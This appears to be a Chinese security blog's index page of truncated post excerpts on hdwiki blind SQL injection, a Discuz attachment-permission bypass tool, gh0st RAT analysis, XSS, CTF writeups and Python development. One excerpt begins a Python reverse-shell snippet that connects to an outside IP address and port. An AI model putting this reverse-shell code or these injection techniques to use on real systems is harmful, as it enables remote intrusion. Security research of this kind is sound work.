hdwiki某处对referer未做过滤，造成sql注入     但因为没有输出点，只能做盲注。     基于时间的盲注脚本已写好，测试可注入...

    实话说，以后不想再挖web漏洞了，也不想发这类文章，web的东西搞来搞起就是那个样，我原本就不想深入，想那些大神一样能把一个cms分析得透彻。我有时候只是泛泛地看，泛泛地找一...

    最近关注的一个discuz平衡权限漏洞，可以绕过附件下载权限达到免费下载附件的目的。于是，自己用C#开发了一个小程序，给大家编译好的exe文件供参考。     0x01 原理...

真的很久很久了，距离上一次写gh0st的文章（https://www.leavesongs.com/C/gh0st_3.html），过去有大半年了。总算有一个时间，我放下手里所有的活，能够继续把这份努力延续下去。 以后对于gh0st...

    好久没写总结文。一转眼就到了4月，离可以游泳的季节又近了一步，心里还有点小激动。     这段时间也是学习了一些新东西，包括富文本的XSS，还有我正在看的node.js...

   协会actf2014队伍.L所有writeup，writen by 冷夜     播放地址：http://le4f.net/post/writeup/-ctf-actf-2014-l.-writeup 相关推荐: HappyCTF-writeup这个比赛...

    python在linux下的反弹shell代码我相信很多人都见过： import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('59.188.234.64',14575)) o...

在freebuf上莫名地被喷，可能是因为被喷让人气上来了，最后得到的金币比前一篇文章更多。塞翁失马，焉知非福？ 尽管现在呼吁所有的程序都使用unicode编码，所有的网站都使用utf-8编码，来一个统...

我很少转载别人的文章的。但这篇确实让我眼前一亮，希望各位看客也能有所收获。 From 91ri ： http://www.91ri.org/8928.html 世界上有两种密码：一种是防止你的小妹妹偷看你的文件；另一种是...

    最近在做python的web开发（原谅我的多变，好东西总想都学着。。。node.js也是），不过过程中总遇到些问题，不管是web.py还是django，开发起来确实没用php方便，毕竟存在的时间比...